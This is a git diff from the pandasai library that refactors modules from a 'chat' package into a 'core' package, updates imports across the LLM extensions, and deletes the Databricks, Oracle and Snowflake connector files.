rename pandasai/{chat => core}/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/correct_output_type_error_prompt.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/generate_python_code.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/generate_python_code_with_sql.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/generate_system_message.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/shared/dataframe.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/shared/output_type_template.tmpl (100%)
rename pandasai/{chat => core}/prompts/templates/shared/vectordb_docs.tmpl (100%)
rename pandasai/{chat => core}/response/__init__.py (100%)
rename pandasai/{chat => core}/response/base.py (96%)
rename pandasai/{chat => core}/response/response_types.py (100%)
rename pandasai/{chat => core}/user_query.py (85%)
delete mode 100644 pandasai/pipelines/chat/code_cleaning.py
delete mode 100644 pandasai/pipelines/chat/code_execution.py
delete mode 100644 pandasai/pipelines/chat/validate_pipeline_input.py
delete mode 100644 pandasai/safe_libs/base_restricted_module.py
delete mode 100644 pandasai/safe_libs/restricted_base64.py
delete mode 100644 pandasai/safe_libs/restricted_datetime.py
delete mode 100644 pandasai/safe_libs/restricted_json.py
delete mode 100644 pandasai/safe_libs/restricted_matplotlib.py
delete mode 100644 pandasai/safe_libs/restricted_numpy.py
delete mode 100644 pandasai/safe_libs/restricted_pandas.py
delete mode 100644 pandasai/safe_libs/restricted_seaborn.py
delete mode 100644 pandasai/schemas/__init__.py
delete mode 100644 tests/unit_tests/agent/test_base_agent.py
create mode 100644 tests/unit_tests/core/code_execution/safe_libs/test_base_restricted_module.py
create mode 100644 tests/unit_tests/core/code_execution/test_code_execution.py
create mode 100644 tests/unit_tests/core/code_execution/test_environment.py
create mode 100644 tests/unit_tests/core/code_generation/test_code_cleaning.py
create mode 100644 tests/unit_tests/core/code_generation/test_code_security.py
create mode 100644 tests/unit_tests/core/code_generation/test_code_validation.py
create mode 100644 tests/unit_tests/core/prompts/test_prompts.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_code_cleaning.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_code_execution.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_code_generator.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_result_validation.py
delete mode 100644 tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py
delete mode 100644 tests/unit_tests/pipelines/test_pipeline.py
delete mode 100644 tests/unit_tests/responses/test_response_serializer.py
delete mode 100644 tests/unit_tests/schemas/__init__.py
delete mode 100644 tests/unit_tests/schemas/test_df_config.py
diff --git a/extensions/ee/connectors/databricks/pandasai_databricks/databricks.py b/extensions/ee/connectors/databricks/pandasai_databricks/databricks.py
deleted file mode 100644
index adb151e61..000000000
--- a/extensions/ee/connectors/databricks/pandasai_databricks/databricks.py
+++ /dev/null
@@ -1,194 +0,0 @@
-"""
-Databricks Connector to connects you to your Databricks SQL Warhouse on
-Azure, AWS and GCP
-"""
-
-from typing import Union, Optional, List, Dict, Any
-import pandas as pd
-from databricks import sql
-
-from pandasai.connectors.base import BaseConnectorConfig
-from pandasai_sql.sql import SQLBaseConnectorConfig, SQLConnector
-
-
-class DatabricksConnectorConfig(SQLBaseConnectorConfig):
- """
- Connector configuration for DataBricks.
- """
-
- host: str
- token: str
- http_path: str
-
-
-class DatabricksConnector(SQLConnector):
- """
- Databricks connectors are used to connect to Databricks Data Cloud.
- """
-
- def __init__(
- self,
- config: Union[DatabricksConnectorConfig, dict],
- **kwargs,
- ):
- """
- Initialize the Databricks connector with the given configuration.
-
- Args:
- config (ConnectorConfig): The configuration for the Databricks connector.
- """
- config["dialect"] = "databricks"
- if isinstance(config, dict):
- env_vars = {
- "token": "DATABRICKS_TOKEN",
- "database": "DATABRICKS_DATABASE",
- "host": "DATABRICKS_HOST",
- "http_path": "DATABRICKS_HTTP_PATH",
- }
- config = self._populate_config_from_env(config, env_vars)
-
- super().__init__(config, **kwargs)
-
- def _load_connector_config(self, config: Union[BaseConnectorConfig, dict]):
- return DatabricksConnectorConfig(**config)
-
- def _init_connection(self, config: DatabricksConnectorConfig):
- """
- Initialize Database Connection
-
- Args:
- config (DatabricksConnectorConfig): Configurations to load database
- """
- self._connection = sql.connect(
- server_hostname=config.host,
- http_path=config.http_path,
- access_token=config.token,
- )
- self._cursor = self._connection.cursor()
-
- def _build_query(
- self,
- limit: Optional[int] = None,
- order: Optional[str] = None,
- where: Optional[List[List[str]]] = None,
- ) -> str:
- """
- Build a SQL query string from the given parameters.
-
- Args:
- limit (Optional[int]): Maximum number of rows to return
- order (Optional[str]): Column to order by
- where (Optional[List[List[str]]]): List of where conditions. If not provided,
- uses conditions from config.
-
- Returns:
- str: The SQL query string
- """
- query = f"SELECT * FROM {self.config.database}.{self.config.table}"
-
- # Add WHERE clause
- where_conditions = (
- where if where is not None else getattr(self.config, "where", None)
- )
- if where_conditions:
- conditions = []
- for condition in where_conditions:
- if len(condition) == 3:
- col, op, val = condition
- if isinstance(val, str):
- val = f"'{val}'"
- conditions.append(f"{col} {op} {val}")
- if conditions:
- query += " WHERE " + " AND ".join(conditions)
-
- # Add ORDER BY clause
- if order:
- query += f" ORDER BY {order} ASC"
-
- # Add LIMIT clause
- if limit:
- query += f" LIMIT {limit}"
-
- return query
-
- def _execute_query(
- self, query: str, params: Optional[Dict[str, Any]] = None
- ) -> pd.DataFrame:
- """
- Execute a query and return the results as a pandas DataFrame
-
- Args:
- query (str): The query to execute
- params (Optional[Dict[str, Any]]): Query parameters
-
- Returns:
- pd.DataFrame: Query results as a DataFrame
- """
- try:
- if params:
- # Replace parameters in query string
- for key, value in params.items():
- if isinstance(value, str):
- value = f"'{value}'"
- query = query.replace(f":{key}", str(value))
-
- self._cursor.execute(query)
- result = self._cursor.fetchall()
-
- if not result:
- return pd.DataFrame()
-
- # Get column names from cursor description
- columns = [desc[0] for desc in self._cursor.description]
-
- # Convert result to DataFrame
- return pd.DataFrame(result, columns=columns)
- except Exception as e:
- self._cursor = self._connection.cursor() # Reset cursor on error
- raise e
-
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Get the first n rows of the table
-
- Args:
- n (int, optional): Number of rows to return. Defaults to 5.
-
- Returns:
- pd.DataFrame: First n rows of the table
- """
- query = self._build_query(limit=n)
- return self._execute_query(query)
-
- def __repr__(self):
- """
- Return the string representation of the Databricks connector.
-
- Returns:
- str: The string representation of the Databricks connector.
- """
- return (
- f"<{self.__class__.__name__} dialect={self.config.dialect} "
- f"host={self.config.host} "
- f"database={self.config.database} http_path={self.config.http_path}"
- )
-
- def equals(self, other):
- if isinstance(other, self.__class__):
- return (
- self.config.dialect,
- self.config.host,
- self.config.http_path,
- ) == (
- other.config.dialect,
- other.config.host,
- other.config.http_path,
- )
- return False
-
- def close(self):
- """Close the database connection"""
- if hasattr(self, "_cursor") and self._cursor:
- self._cursor.close()
- if hasattr(self, "_connection") and self._connection:
- self._connection.close()
diff --git a/extensions/ee/connectors/oracle/pandasai_oracle/oracle.py b/extensions/ee/connectors/oracle/pandasai_oracle/oracle.py
deleted file mode 100644
index b0957101a..000000000
--- a/extensions/ee/connectors/oracle/pandasai_oracle/oracle.py
+++ /dev/null
@@ -1,62 +0,0 @@
-from functools import cache
-import pandas as pd
-from typing import Union
-from pandasai_sql import SQLConnector, SQLConnectorConfig
-
-
-class OracleConnector(SQLConnector):
- """
- Oracle connectors are used to connect to Oracle databases.
- """
-
- def __init__(
- self,
- config: Union[SQLConnectorConfig, dict],
- **kwargs,
- ):
- """
- Initialize the Oracle connector with the given configuration.
-
- Args:
- config (ConnectorConfig): The configuration for the Oracle connector.
- """
- config["dialect"] = "oracle"
- config["driver"] = "cx_oracle"
-
- if isinstance(config, dict):
- oracle_env_vars = {
- "host": "ORACLE_HOST",
- "port": "ORACLE_PORT",
- "database": "ORACLE_DATABASE",
- "username": "ORACLE_USERNAME",
- "password": "ORACLE_PASSWORD",
- }
- config = self._populate_config_from_env(config, oracle_env_vars)
-
- super().__init__(config, **kwargs)
-
- @cache
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Return the head of the data source that the connector is connected to.
- This information is passed to the LLM to provide the schema of the data source.
-
- Returns:
- DataFrame: The head of the data source.
- """
-
- if self.logger:
- self.logger.log(
- f"Getting head of {self.config.table} "
- f"using dialect {self.config.dialect}"
- )
-
- # Run a SQL query to get all the columns names and 5 random rows
- query = self._build_query(limit=n, order="dbms_random.value")
-
- # Return the head of the data source
- return pd.read_sql(query, self._connection)
-
- @property
- def cs_table_name(self):
- return f'"{self.config.table}"'
diff --git a/extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py b/extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py
deleted file mode 100644
index e45445d9e..000000000
--- a/extensions/ee/connectors/snowflake/pandasai_snowflake/snowflake.py
+++ /dev/null
@@ -1,123 +0,0 @@
-from functools import cache
-from typing import Union
-
-from sqlalchemy import create_engine
-
-import pandas as pd
-
-from pandasai.connectors.base import BaseConnectorConfig
-from pandasai_sql.sql import SQLBaseConnectorConfig, SQLConnector
-
-
-class SnowflakeConnectorConfig(SQLBaseConnectorConfig):
- """
- Connector configuration for Snowflake.
- """
-
- account: str
- database: str
- username: str
- password: str
- dbSchema: str
- warehouse: str
-
-
-class SnowflakeConnector(SQLConnector):
- """
- Snowflake connectors are used to connect to Snowflake Data Cloud.
- """
-
- def __init__(
- self,
- config: Union[SnowflakeConnectorConfig, dict],
- **kwargs,
- ):
- """
- Initialize the Snowflake connector with the given configuration.
-
- Args:
- config (ConnectorConfig): The configuration for the Snowflake connector.
- """
- config["dialect"] = "snowflake"
-
- if isinstance(config, dict):
- snowflake_env_vars = {
- "account": "SNOWFLAKE_HOST",
- "database": "SNOWFLAKE_DATABASE",
- "warehouse": "SNOWFLAKE_WAREHOUSE",
- "dbSchema": "SNOWFLAKE_SCHEMA",
- "username": "SNOWFLAKE_USERNAME",
- "password": "SNOWFLAKE_PASSWORD",
- }
- config = self._populate_config_from_env(config, snowflake_env_vars)
-
- super().__init__(config, **kwargs)
-
- def _load_connector_config(self, config: Union[BaseConnectorConfig, dict]):
- return SnowflakeConnectorConfig(**config)
-
- def _init_connection(self, config: SnowflakeConnectorConfig):
- """
- Initialize Database Connection
-
- Args:
- config (SQLConnectorConfig): Configurations to load database
-
- """
- self._engine = create_engine(
- f"{config.dialect}://{config.username}:{config.password}@{config.account}/?warehouse={config.warehouse}&database={config.database}&schema={config.dbSchema}"
- )
-
- self._connection = self._engine.connect()
-
- @cache
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Return the head of the data source that the connector is connected to.
- This information is passed to the LLM to provide the schema of the data source.
-
- Returns:
- DataFrame: The head of the data source.
- """
-
- if self.logger:
- self.logger.log(
- f"Getting head of {self.config.table} "
- f"using dialect {self.config.dialect}"
- )
-
- # Run a SQL query to get all the columns names and 5 random rows
- query = self._build_query(limit=n, order="RANDOM()")
-
- # Return the head of the data source
- return pd.read_sql(query, self._connection)
-
- def __repr__(self):
- """
- Return the string representation of the Snowflake connector.
-
- Returns:
- str: The string representation of the Snowflake connector.
- """
- return (
- f"<{self.__class__.__name__} dialect={self.config.dialect} "
- f"Account={self.config.account} "
- f"warehouse={self.config.warehouse} "
- f"database={self.config.database} schema={str(self.config.dbSchema)} "
- f"table={self.config.table}>"
- )
-
- def equals(self, other):
- if isinstance(other, self.__class__):
- return (
- self.config.dialect,
- self.config.dbSchema,
- self.config.warehouse,
- self.config.account,
- ) == (
- other.config.dialect,
- other.config.dbSchema,
- other.config.warehouse,
- other.config.account,
- )
- return False
diff --git a/extensions/llms/bedrock/pandasai_bedrock/base.py b/extensions/llms/bedrock/pandasai_bedrock/base.py
index 606248747..a4ab2c481 100644
--- a/extensions/llms/bedrock/pandasai_bedrock/base.py
+++ b/extensions/llms/bedrock/pandasai_bedrock/base.py
@@ -3,7 +3,7 @@
from abc import abstractmethod
from typing import TYPE_CHECKING, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.exceptions import (
diff --git a/extensions/llms/bedrock/pandasai_bedrock/claude.py b/extensions/llms/bedrock/pandasai_bedrock/claude.py
index cc15ee8d4..f48e15510 100644
--- a/extensions/llms/bedrock/pandasai_bedrock/claude.py
+++ b/extensions/llms/bedrock/pandasai_bedrock/claude.py
@@ -3,7 +3,7 @@
import json
from typing import TYPE_CHECKING, Any, Dict, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import APIKeyNotFoundError, UnsupportedModelError
from pandasai.helpers import load_dotenv
from pandasai.llm.base import LLM
diff --git a/extensions/llms/bedrock/tests/test_bedrock_claude.py b/extensions/llms/bedrock/tests/test_bedrock_claude.py
index 614e5153e..2c022bcaf 100644
--- a/extensions/llms/bedrock/tests/test_bedrock_claude.py
+++ b/extensions/llms/bedrock/tests/test_bedrock_claude.py
@@ -6,7 +6,7 @@
import pytest
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import APIKeyNotFoundError, UnsupportedModelError
from extensions.llms.bedrock.pandasai_bedrock.claude import BedrockClaude
diff --git a/extensions/llms/google/pandasai_google/base.py b/extensions/llms/google/pandasai_google/base.py
index 606248747..a4ab2c481 100644
--- a/extensions/llms/google/pandasai_google/base.py
+++ b/extensions/llms/google/pandasai_google/base.py
@@ -3,7 +3,7 @@
from abc import abstractmethod
from typing import TYPE_CHECKING, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.exceptions import (
diff --git a/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py b/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py
index a6dd3fbaf..2717d5391 100644
--- a/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py
+++ b/extensions/llms/huggingface/pandasai_huggingface/huggingface_text_gen.py
@@ -3,7 +3,7 @@
from typing import TYPE_CHECKING, Any, Dict, List, Optional
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers import load_dotenv
from pandasai.llm.base import LLM
diff --git a/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py b/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py
index be6858dc2..dcbd5cc3c 100644
--- a/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py
+++ b/extensions/llms/ibm/pandasai_ibm/ibm_watsonx.py
@@ -3,8 +3,8 @@
import os
from typing import TYPE_CHECKING, Optional
-from pandasai.chat.code_execution.environment import import_dependency
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.code_execution.environment import import_dependency
+from pandasai.core.prompts.base import BasePrompt
from pandasai.exceptions import APIKeyNotFoundError
from pandasai.helpers import load_dotenv
diff --git a/extensions/llms/langchain/pandasai_langchain/langchain.py b/extensions/llms/langchain/pandasai_langchain/langchain.py
index 067c77131..91e361a47 100644
--- a/extensions/llms/langchain/pandasai_langchain/langchain.py
+++ b/extensions/llms/langchain/pandasai_langchain/langchain.py
@@ -1,6 +1,6 @@
from __future__ import annotations
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
try:
from langchain_core.language_models import BaseLanguageModel
diff --git a/extensions/llms/local/pandasai_local/local_llm.py b/extensions/llms/local/pandasai_local/local_llm.py
index d8761159e..256a65e38 100644
--- a/extensions/llms/local/pandasai_local/local_llm.py
+++ b/extensions/llms/local/pandasai_local/local_llm.py
@@ -4,7 +4,7 @@
from openai import OpenAI
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.llm.base import LLM
diff --git a/extensions/llms/openai/pandasai_openai/base.py b/extensions/llms/openai/pandasai_openai/base.py
index 75afc74a9..4ff4d1a79 100644
--- a/extensions/llms/openai/pandasai_openai/base.py
+++ b/extensions/llms/openai/pandasai_openai/base.py
@@ -2,7 +2,7 @@
from typing import TYPE_CHECKING, Any, Dict, Mapping, Optional, Tuple, Union
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.helpers.memory import Memory
from pandasai.llm.base import LLM
diff --git a/pandasai/agent/base.py b/pandasai/agent/base.py
index 5f1a7f12b..f7b9c7b56 100644
--- a/pandasai/agent/base.py
+++ b/pandasai/agent/base.py
@@ -2,23 +2,23 @@
import uuid
from typing import Any, List, Optional, Tuple, Union
-from pandasai.chat.cache import Cache
-from pandasai.chat.code_execution.code_executor import CodeExecutor
-from pandasai.chat.code_generation.base import CodeGenerator
-from pandasai.chat.prompts import (
+from pandasai.core.cache import Cache
+from pandasai.core.code_execution.code_executor import CodeExecutor
+from pandasai.core.code_generation.base import CodeGenerator
+from pandasai.core.prompts import (
get_chat_prompt,
get_chat_prompt_for_sql,
get_correct_error_prompt,
get_correct_error_prompt_for_sql,
get_correct_output_type_error_prompt,
)
-from pandasai.chat.response.base import ResponseParser
-from pandasai.chat.user_query import UserQuery
+from pandasai.core.response.base import ResponseParser
+from pandasai.core.user_query import UserQuery
from pandasai.dataframe.base import DataFrame
from pandasai.dataframe.virtual_dataframe import VirtualDataFrame
from .state import AgentState
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from pandasai.data_loader.schema_validator import is_schema_source_same
from pandasai.llm.bamboo_llm import BambooLLM
from pandasai.vectorstores.vectorstore import VectorStore
@@ -166,6 +166,7 @@ def generate_code(
if self._state.config.direct_sql
else get_chat_prompt(self._state)
)
+
code, additional_dependencies = self._code_generator.generate_code(prompt)
self._state.last_prompt_used = prompt
return code, additional_dependencies
@@ -297,7 +298,9 @@ def _validate_input(self):
def _process_query(self, query: str, output_type: Optional[str] = None):
"""Process a user query and return the result."""
- query = UserQuery(query)
+ query = UserQuery(
+ query, secure=self._state.config.security in ["standard", "advanced"]
+ )
self._state.logger.log(f"Question: {query}")
self._state.logger.log(
f"Running PandasAI with {self._state.config.llm.type} LLM..."
diff --git a/pandasai/chat/cache.py b/pandasai/core/cache.py
similarity index 100%
rename from pandasai/chat/cache.py
rename to pandasai/core/cache.py
diff --git a/pandasai/chat/code_execution/__init__.py b/pandasai/core/code_execution/__init__.py
similarity index 100%
rename from pandasai/chat/code_execution/__init__.py
rename to pandasai/core/code_execution/__init__.py
diff --git a/pandasai/chat/code_execution/code_executor.py b/pandasai/core/code_execution/code_executor.py
similarity index 98%
rename from pandasai/chat/code_execution/code_executor.py
rename to pandasai/core/code_execution/code_executor.py
index 8b188be85..91aa13816 100644
--- a/pandasai/chat/code_execution/code_executor.py
+++ b/pandasai/core/code_execution/code_executor.py
@@ -1,5 +1,5 @@
import ast
-from pandasai.chat.code_execution.environment import get_environment
+from pandasai.core.code_execution.environment import get_environment
from pandasai.config import Config
from pandasai.exceptions import NoResultFoundError
diff --git a/pandasai/chat/code_execution/environment.py b/pandasai/core/code_execution/environment.py
similarity index 100%
rename from pandasai/chat/code_execution/environment.py
rename to pandasai/core/code_execution/environment.py
diff --git a/pandasai/chat/code_execution/safe_libs/base_restricted_module.py b/pandasai/core/code_execution/safe_libs/base_restricted_module.py
similarity index 74%
rename from pandasai/chat/code_execution/safe_libs/base_restricted_module.py
rename to pandasai/core/code_execution/safe_libs/base_restricted_module.py
index ce3bf21a5..e59d9c99b 100644
--- a/pandasai/chat/code_execution/safe_libs/base_restricted_module.py
+++ b/pandasai/core/code_execution/safe_libs/base_restricted_module.py
@@ -15,10 +15,14 @@ def wrapper(*args, **kwargs):
return wrapper
def _wrap_class(self, cls):
- class WrappedClass(cls):
+ class WrappedClass(cls, BaseRestrictedModule):
def __getattribute__(self, name):
+ # Avoid wrapping specific attributes like _wrap_function
+ if name in {"_wrap_function", "__class__"}:
+ return super().__getattribute__(name)
+
attr = super().__getattribute__(name)
- return self._wrap_function(self, attr) if callable(attr) else attr
+ return self._wrap_function(attr) if callable(attr) else attr
return WrappedClass
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_base64.py b/pandasai/core/code_execution/safe_libs/restricted_base64.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_base64.py
rename to pandasai/core/code_execution/safe_libs/restricted_base64.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_datetime.py b/pandasai/core/code_execution/safe_libs/restricted_datetime.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_datetime.py
rename to pandasai/core/code_execution/safe_libs/restricted_datetime.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_json.py b/pandasai/core/code_execution/safe_libs/restricted_json.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_json.py
rename to pandasai/core/code_execution/safe_libs/restricted_json.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_matplotlib.py b/pandasai/core/code_execution/safe_libs/restricted_matplotlib.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_matplotlib.py
rename to pandasai/core/code_execution/safe_libs/restricted_matplotlib.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_numpy.py b/pandasai/core/code_execution/safe_libs/restricted_numpy.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_numpy.py
rename to pandasai/core/code_execution/safe_libs/restricted_numpy.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_pandas.py b/pandasai/core/code_execution/safe_libs/restricted_pandas.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_pandas.py
rename to pandasai/core/code_execution/safe_libs/restricted_pandas.py
diff --git a/pandasai/chat/code_execution/safe_libs/restricted_seaborn.py b/pandasai/core/code_execution/safe_libs/restricted_seaborn.py
similarity index 100%
rename from pandasai/chat/code_execution/safe_libs/restricted_seaborn.py
rename to pandasai/core/code_execution/safe_libs/restricted_seaborn.py
diff --git a/pandasai/chat/code_generation/__init__.py b/pandasai/core/code_generation/__init__.py
similarity index 100%
rename from pandasai/chat/code_generation/__init__.py
rename to pandasai/core/code_generation/__init__.py
diff --git a/pandasai/chat/code_generation/base.py b/pandasai/core/code_generation/base.py
similarity index 97%
rename from pandasai/chat/code_generation/base.py
rename to pandasai/core/code_generation/base.py
index 17c184749..498acec5a 100644
--- a/pandasai/chat/code_generation/base.py
+++ b/pandasai/core/code_generation/base.py
@@ -1,7 +1,7 @@
import traceback
from pandasai.agent.state import AgentState
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
from .code_cleaning import CodeCleaner
from .code_security import CodeSecurityChecker
from .code_validation import CodeRequirementValidator
diff --git a/pandasai/chat/code_generation/code_cleaning.py b/pandasai/core/code_generation/code_cleaning.py
similarity index 98%
rename from pandasai/chat/code_generation/code_cleaning.py
rename to pandasai/core/code_generation/code_cleaning.py
index 2ba470204..7d288d6c1 100644
--- a/pandasai/chat/code_generation/code_cleaning.py
+++ b/pandasai/core/code_generation/code_cleaning.py
@@ -6,7 +6,7 @@
import astor
from pandasai.agent.state import AgentState
-from pandasai.chat.code_execution.code_executor import CodeExecutor
+from pandasai.core.code_execution.code_executor import CodeExecutor
from pandasai.helpers.path import find_project_root
from pandasai.helpers.sql import extract_table_names
@@ -43,7 +43,7 @@ def _check_imports(self, node: Union[ast.Import, ast.ImportFrom]):
return
whitelisted_libs = (
- WHITELISTED_LIBRARIES + self._config.custom_whitelisted_dependencies
+ WHITELISTED_LIBRARIES + self.context.config.custom_whitelisted_dependencies
)
if library not in whitelisted_libs:
@@ -191,7 +191,7 @@ def extract_fix_dataframe_redeclarations(
if target_names and self.check_is_df_declaration(node):
# Construct dataframe from node
code = "\n".join(code_lines)
- code_executor = CodeExecutor(additional_deps)
+ code_executor = CodeExecutor(self.context.config, additional_deps)
code_executor.add_to_env("dfs", copy.deepcopy(self.context.dfs))
env = code_executor.execute(code)
diff --git a/pandasai/chat/code_generation/code_security.py b/pandasai/core/code_generation/code_security.py
similarity index 100%
rename from pandasai/chat/code_generation/code_security.py
rename to pandasai/core/code_generation/code_security.py
diff --git a/pandasai/chat/code_generation/code_validation.py b/pandasai/core/code_generation/code_validation.py
similarity index 100%
rename from pandasai/chat/code_generation/code_validation.py
rename to pandasai/core/code_generation/code_validation.py
diff --git a/pandasai/chat/prompts/__init__.py b/pandasai/core/prompts/__init__.py
similarity index 94%
rename from pandasai/chat/prompts/__init__.py
rename to pandasai/core/prompts/__init__.py
index d3e0a1a13..9fcb903a0 100644
--- a/pandasai/chat/prompts/__init__.py
+++ b/pandasai/core/prompts/__init__.py
@@ -1,9 +1,9 @@
from __future__ import annotations
from typing import TYPE_CHECKING
-from pandasai.chat.prompts.correct_execute_sql_query_usage_error_prompt import (
+from pandasai.core.prompts.correct_execute_sql_query_usage_error_prompt import (
CorrectExecuteSQLQueryUsageErrorPrompt,
)
-from pandasai.chat.prompts.correct_output_type_error_prompt import (
+from pandasai.core.prompts.correct_output_type_error_prompt import (
CorrectOutputTypeErrorPrompt,
)
from .generate_python_code_with_sql import GeneratePythonCodeWithSQLPrompt
diff --git a/pandasai/chat/prompts/base.py b/pandasai/core/prompts/base.py
similarity index 100%
rename from pandasai/chat/prompts/base.py
rename to pandasai/core/prompts/base.py
diff --git a/pandasai/chat/prompts/correct_error_prompt.py b/pandasai/core/prompts/correct_error_prompt.py
similarity index 100%
rename from pandasai/chat/prompts/correct_error_prompt.py
rename to pandasai/core/prompts/correct_error_prompt.py
diff --git a/pandasai/chat/prompts/correct_execute_sql_query_usage_error_prompt.py b/pandasai/core/prompts/correct_execute_sql_query_usage_error_prompt.py
similarity index 94%
rename from pandasai/chat/prompts/correct_execute_sql_query_usage_error_prompt.py
rename to pandasai/core/prompts/correct_execute_sql_query_usage_error_prompt.py
index e373fbd17..f5a9b8613 100644
--- a/pandasai/chat/prompts/correct_execute_sql_query_usage_error_prompt.py
+++ b/pandasai/core/prompts/correct_execute_sql_query_usage_error_prompt.py
@@ -1,4 +1,4 @@
-from pandasai.chat.prompts.base import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class CorrectExecuteSQLQueryUsageErrorPrompt(BasePrompt):
diff --git a/pandasai/chat/prompts/correct_output_type_error_prompt.py b/pandasai/core/prompts/correct_output_type_error_prompt.py
similarity index 100%
rename from pandasai/chat/prompts/correct_output_type_error_prompt.py
rename to pandasai/core/prompts/correct_output_type_error_prompt.py
diff --git a/pandasai/chat/prompts/file_based_prompt.py b/pandasai/core/prompts/file_based_prompt.py
similarity index 100%
rename from pandasai/chat/prompts/file_based_prompt.py
rename to pandasai/core/prompts/file_based_prompt.py
diff --git a/pandasai/chat/prompts/generate_python_code.py b/pandasai/core/prompts/generate_python_code.py
similarity index 100%
rename from pandasai/chat/prompts/generate_python_code.py
rename to pandasai/core/prompts/generate_python_code.py
diff --git a/pandasai/chat/prompts/generate_python_code_with_sql.py b/pandasai/core/prompts/generate_python_code_with_sql.py
similarity index 76%
rename from pandasai/chat/prompts/generate_python_code_with_sql.py
rename to pandasai/core/prompts/generate_python_code_with_sql.py
index 1f39aa962..e90f72d7c 100644
--- a/pandasai/chat/prompts/generate_python_code_with_sql.py
+++ b/pandasai/core/prompts/generate_python_code_with_sql.py
@@ -1,4 +1,4 @@
-from pandasai.chat.prompts.generate_python_code import GeneratePythonCodePrompt
+from pandasai.core.prompts.generate_python_code import GeneratePythonCodePrompt
class GeneratePythonCodeWithSQLPrompt(GeneratePythonCodePrompt):
diff --git a/pandasai/chat/prompts/generate_system_message.py b/pandasai/core/prompts/generate_system_message.py
similarity index 100%
rename from pandasai/chat/prompts/generate_system_message.py
rename to pandasai/core/prompts/generate_system_message.py
diff --git a/pandasai/chat/prompts/templates/correct_error_prompt.tmpl b/pandasai/core/prompts/templates/correct_error_prompt.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/correct_error_prompt.tmpl
rename to pandasai/core/prompts/templates/correct_error_prompt.tmpl
diff --git a/pandasai/chat/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl b/pandasai/core/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl
rename to pandasai/core/prompts/templates/correct_execute_sql_query_usage_error_prompt.tmpl
diff --git a/pandasai/chat/prompts/templates/correct_output_type_error_prompt.tmpl b/pandasai/core/prompts/templates/correct_output_type_error_prompt.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/correct_output_type_error_prompt.tmpl
rename to pandasai/core/prompts/templates/correct_output_type_error_prompt.tmpl
diff --git a/pandasai/chat/prompts/templates/generate_python_code.tmpl b/pandasai/core/prompts/templates/generate_python_code.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/generate_python_code.tmpl
rename to pandasai/core/prompts/templates/generate_python_code.tmpl
diff --git a/pandasai/chat/prompts/templates/generate_python_code_with_sql.tmpl b/pandasai/core/prompts/templates/generate_python_code_with_sql.tmpl
similarity index 100%
rename from pandasai/chat/prompts/templates/generate_python_code_with_sql.tmpl
rename to pandasai/core/prompts/templates/generate_python_code_with_sql.tmpl
diff --git a/pandasai/chat/prompts/templates/generate_system_message.tmpl b/pandasai/core/prompts/templates/generate_system_message.tmpl
similarity index 100%
